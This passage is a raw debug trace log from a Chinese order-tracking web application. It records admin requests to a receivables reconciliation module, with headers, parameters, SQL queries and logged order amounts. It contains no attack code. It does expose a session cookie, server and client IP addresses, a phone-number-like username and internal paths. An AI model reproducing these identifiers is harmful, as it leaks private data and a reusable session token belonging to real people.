(`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('跟单系统 财务管理 校对应收账款 核对' , '{\"dialog\":\"1\",\"kehu_id\":[\"\\u5357\",\"170\"],\"verify_amount\":[\"4000\",\"4000\",\"4000\",\"4000\"],\"price\":[\"3.58\",\"1\",\"0.06\",\"0.06\"],\"money\":[\"14320\",\"4000\",\"240\",\"240\"],\"explain\":[\"100W-10\\u5e95\\u58f34000\\u4e2a\",\"100W-1\\u4e0a\\u76d64000\\u4e2a\",\"\\u5927\\u5e73\\u538b\\u677f4000\\u4e2a\",\"\\u5927\\u5f2f\\u538b\\u677f4000\\u4e2a\"],\"shoukuan_status-1\":\"1\",\"shoukuan_status-2\":\"1\",\"shoukuan_status-3\":\"1\",\"shoukuan_status-4\":\"1\",\"ids\":\"1753\"}' , '/admin/financial/verifybill/hedui/ids/1753?dialog=1' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658308053) [ RunTime:0.003266s ] --------------------------------------------------------------- [ 2022-07-20T17:07:33+08:00 ] 106.112.205.110 GET /admin/financial/verifybill/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222022-06-20+00%3A00%3A00%22%2C%22end_time%22%3A%222022-07-20+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1658306703523 [ info ] 47.105.33.115:8081/admin/financial/verifybill/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222022-06-20+00%3A00%3A00%22%2C%22end_time%22%3A%222022-07-20+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1658306703523 [运行时间:0.079286s][吞吐率:12.61req/s] [内存消耗:5,691.62kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001215s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=gk91f7mp89i7dggs5dsr9vjrg4', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{"start_time":"2022-06-20 00:00:00","end_time":"2022-07-20 23:59:59"}', 'op' => '{"start_time":"=","end_time":"="}', '_' => '1658306703523', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001943s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->index[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000106s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000554s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001343s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000402s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001033s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.000996s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001600s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000366s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.001257s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.001116s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.001412s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM ( SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,outboundandorder.id AS outboundandorder__id,outboundandorder.outbound_id AS outboundandorder__outbound_id,outboundandorder.orderinfo_id AS outboundandorder__orderinfo_id,outboundandorder.kehu_id AS outboundandorder__kehu_id,outboundandorder.amount AS outboundandorder__amount,outboundandorder.money AS outboundandorder__money,outboundandorder.price AS outboundandorder__price,outboundandorder.productinfo_id AS outboundandorder__productinfo_id,outboundandorder.factorymge_id AS outboundandorder__factorymge_id,outboundandorder.staffinfo_id AS outboundandorder__staffinfo_id,outboundandorder.admin_id AS outboundandorder__admin_id,outboundandorder.createtime AS outboundandorder__createtime,outboundandorder.updatetime AS outboundandorder__updatetime,outboundandorder.verify_status AS outboundandorder__verify_status,outboundandorder.verify_amount AS outboundandorder__verify_amount,count(*) FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_outboundandorder` `outboundandorder` ON `outbound`.`id`=`outboundandorder`.`outbound_id` WHERE ( outbound.createtime > 1655654400 ) AND ( outbound.createtime <= 1658332799 ) AND `outboundandorder`.`verify_status` = 0 AND `outbound`.`factorymge_id` = '40' GROUP BY `outbound`.`id` ORDER BY `outbound`.`id` DESC ) `_group_count_` LIMIT 1 [ RunTime:0.003763s ] [ sql ] [ SQL ] SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,outboundandorder.id AS outboundandorder__id,outboundandorder.outbound_id AS outboundandorder__outbound_id,outboundandorder.orderinfo_id AS outboundandorder__orderinfo_id,outboundandorder.kehu_id AS outboundandorder__kehu_id,outboundandorder.amount AS outboundandorder__amount,outboundandorder.money AS outboundandorder__money,outboundandorder.price AS outboundandorder__price,outboundandorder.productinfo_id AS outboundandorder__productinfo_id,outboundandorder.factorymge_id AS outboundandorder__factorymge_id,outboundandorder.staffinfo_id AS outboundandorder__staffinfo_id,outboundandorder.admin_id AS outboundandorder__admin_id,outboundandorder.createtime AS outboundandorder__createtime,outboundandorder.updatetime AS outboundandorder__updatetime,outboundandorder.verify_status AS outboundandorder__verify_status,outboundandorder.verify_amount AS outboundandorder__verify_amount FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_outboundandorder` `outboundandorder` ON `outbound`.`id`=`outboundandorder`.`outbound_id` WHERE `outboundandorder`.`verify_status` = 0 AND ( outbound.createtime > 1655654400 ) AND ( outbound.createtime <= 1658332799 ) AND `outbound`.`factorymge_id` = '40' GROUP BY `outbound`.`id` ORDER BY `outbound`.`id` DESC LIMIT 0,10 [ RunTime:0.003346s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 1763 [ RunTime:0.001896s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 1759 [ RunTime:0.002012s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 1758 [ RunTime:0.001872s ] --------------------------------------------------------------- [ 2022-07-20T17:07:36+08:00 ] 106.112.205.110 GET /admin/financial/verifybill/hedui/ids/1763?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/verifybill/hedui/ids/1763?dialog=1 [运行时间:0.076202s][吞吐率:13.12req/s] [内存消耗:6,269.68kb] [文件加载:89] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000050s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001229s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'hedui', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=gk91f7mp89i7dggs5dsr9vjrg4', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'ids' => '1763', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001800s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->hedui[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/verifybill/hedui.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'shoukuanStatusList', 8 => 'start_time', 9 => 'end_time', 10 => 'total', 11 => 'outbound', 12 => 'rows', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000100s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000442s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001433s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000419s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001123s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001142s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001759s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000388s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.001296s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001304s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001595s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.001138s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.001190s ] [ sql ] [ SQL ] SELECT `outboundandorder`.`id`,`outboundandorder`.`outbound_id`,`outboundandorder`.`orderinfo_id`,`outboundandorder`.`kehu_id`,`outboundandorder`.`amount`,`outboundandorder`.`money`,`outboundandorder`.`price`,`outboundandorder`.`productinfo_id`,`outboundandorder`.`factorymge_id`,`outboundandorder`.`staffinfo_id`,`outboundandorder`.`admin_id`,`outboundandorder`.`createtime`,`outboundandorder`.`updatetime`,`outboundandorder`.`verify_status`,`outboundandorder`.`verify_amount`,orderinfo.id AS orderinfo__id,orderinfo.nei_number AS orderinfo__nei_number,orderinfo.number AS orderinfo__number,orderinfo.pid AS orderinfo__pid,orderinfo.order_company AS orderinfo__order_company,orderinfo.order_connect AS orderinfo__order_connect,orderinfo.order_phone AS orderinfo__order_phone,orderinfo.kehu_id AS orderinfo__kehu_id,orderinfo.price AS orderinfo__price,orderinfo.material_id AS orderinfo__material_id,orderinfo.pProductinfo_id AS orderinfo__pProductinfo_id,orderinfo.productinfo_id AS orderinfo__productinfo_id,orderinfo.order_type AS orderinfo__order_type,orderinfo.order_status AS orderinfo__order_status,orderinfo.all_order_status AS orderinfo__all_order_status,orderinfo.shengchan_status AS orderinfo__shengchan_status,orderinfo.zuixinshuoming AS orderinfo__zuixinshuoming,orderinfo.guzhangshu AS orderinfo__guzhangshu,orderinfo.zuixinguzhang AS orderinfo__zuixinguzhang,orderinfo.techprocess_id AS orderinfo__techprocess_id,orderinfo.actual_amount AS orderinfo__actual_amount,orderinfo.kucun_amount AS orderinfo__kucun_amount,orderinfo.produce_amount AS orderinfo__produce_amount,orderinfo.produced_amount AS orderinfo__produced_amount,orderinfo.waste_amount AS orderinfo__waste_amount,orderinfo.produced_time AS orderinfo__produced_time,orderinfo.send_amount AS orderinfo__send_amount,orderinfo.ruku_posi AS orderinfo__ruku_posi,orderinfo.sent_amount AS orderinfo__sent_amount,orderinfo.out_time AS orderinfo__out_time,orderinfo.build_order_staffid AS orderinfo__build_order_staffid,orderinfo.factorymge_id AS orderinfo__factorymge_id,orderinfo.admin_id AS orderinfo__admin_id,orderinfo.remind_day AS orderinfo__remind_day,orderinfo.build_time AS orderinfo__build_time,orderinfo.end_time AS orderinfo__end_time,orderinfo.responsible_staffinfos AS orderinfo__responsible_staffinfos,orderinfo.responsible_staffinfovars AS orderinfo__responsible_staffinfovars,orderinfo.feedback AS orderinfo__feedback,orderinfo.guoqitime AS orderinfo__guoqitime,orderinfo.guoqi_status AS orderinfo__guoqi_status,orderinfo.put_position AS orderinfo__put_position,orderinfo.createtime AS orderinfo__createtime,orderinfo.updatetime AS orderinfo__updatetime,orderinfo.is_modify AS orderinfo__is_modify,orderinfo.purchaseorder_id AS orderinfo__purchaseorder_id,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,outbound.id AS outbound__id,outbound.number AS outbound__number,outbound.kehu_id AS outbound__kehu_id,outbound.total_money AS outbound__total_money,outbound.buildstaff_id AS outbound__buildstaff_id,outbound.staffinfo_id AS outbound__staffinfo_id,outbound.factorymge_id AS outbound__factorymge_id,outbound.complete_status AS outbound__complete_status,outbound.admin_id AS outbound__admin_id,outbound.is_print AS outbound__is_print,outbound.createtime AS outbound__createtime,outbound.updatetime AS outbound__updatetime FROM `ot_outboundandorder` `outboundandorder` LEFT JOIN `ot_orderinfo` `orderinfo` ON `outboundandorder`.`orderinfo_id`=`orderinfo`.`id` LEFT JOIN `ot_productinfo` `productinfo` ON `outboundandorder`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outboundandorder`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `outboundandorder`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_outbound` `outbound` ON `outboundandorder`.`outbound_id`=`outbound`.`id` WHERE `outbound`.`id` = '1763' [ RunTime:0.002636s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1211 LIMIT 1 [ RunTime:0.000408s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1212 LIMIT 1 [ RunTime:0.000216s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1209 LIMIT 1 [ RunTime:0.000401s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1210 LIMIT 1 [ RunTime:0.000368s ] [ sql ] [ SQL ] SELECT * FROM `ot_outbound` WHERE `id` = 1763 LIMIT 1 [ RunTime:0.000316s ] --------------------------------------------------------------- [ 2022-07-20T17:07:36+08:00 ] 106.112.205.110 GET /admin/ajax/lang?callback=define&controllername=financial.verifybill&v=1658308056 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.verifybill&v=1658308056 [运行时间:0.035497s][吞吐率:28.17req/s] [内存消耗:3,849.99kb] [文件加载:71] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000061s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001268s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/1763?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=gk91f7mp89i7dggs5dsr9vjrg4', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.verifybill', 'v' => '1658308056', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001731s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000099s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:07:37+08:00 ] 106.112.205.110 POST /admin/staffmge/kehu/getfackehu [ info ] 47.105.33.115:8081/admin/staffmge/kehu/getfackehu [运行时间:0.049877s][吞吐率:20.05req/s] [内存消耗:5,009.16kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001154s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.kehu', 2 => 'getfackehu', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '158', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/1763?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=gk91f7mp89i7dggs5dsr9vjrg4', ) [ info ] [ PARAM ] array ( 'searchTable' => 'tbl', 'searchKey' => 'id', 'searchValue' => '187', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'showField' => 'name', 'keyField' => 'id', 'keyValue' => '187', 'searchField' => array ( 0 => 'name', ), ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001602s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/kehu.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Kehu->getfackehu[ /alidata/www/gendan/application/admin/controller/staffmge/Kehu.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.005740s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000419s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.001415s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_kehu` WHERE `id` IN (187) AND ( factorymge_id =40 ) LIMIT 1 [ RunTime:0.000339s ] [ sql ] [ SQL ] SELECT * FROM `ot_kehu` WHERE `id` IN (187) AND ( factorymge_id =40 ) ORDER BY `name` ASC LIMIT 0,20 [ RunTime:0.000279s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001115s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"searchTable\":\"tbl\",\"searchKey\":\"id\",\"searchValue\":\"187\",\"orderBy\":[[\"name\",\"ASC\"]],\"showField\":\"name\",\"keyField\":\"id\",\"keyValue\":\"187\",\"searchField\":[\"name\"]}' , '/admin/staffmge/kehu/getfackehu' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658308057) [ RunTime:0.003436s ] --------------------------------------------------------------- [ 2022-07-20T17:07:44+08:00 ] 106.112.205.110 POST /admin/financial/verifybill/hedui/ids/1763?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/verifybill/hedui/ids/1763?dialog=1 [运行时间:0.197987s][吞吐率:5.05req/s] [内存消耗:6,219.75kb] [文件加载:94] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001065s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'hedui', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '681', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/1763?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=gk91f7mp89i7dggs5dsr9vjrg4', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'kehu_id' => array ( 0 => '样品', 1 => '187', ), 'verify_amount' => array ( 0 => '5', 1 => '5', 2 => '5', 3 => '5', ), 'price' => array ( 0 => '0.8000000000', 1 => '0.3500000000', 2 => '1.2000000000', 3 => '0.8000000000', ), 'money' => array ( 0 => '4.0000000000', 1 => '1.7500000000', 2 => '6.0000000000', 3 => '4.0000000000', ), 'explain' => array ( 0 => '50W长条底壳5个', 1 => '50W长条上盖5个', 2 => '100W长条底壳5个', 3 => '100W长条上盖5个', ), 'shoukuan_status-1' => '1', 'shoukuan_status-2' => '1', 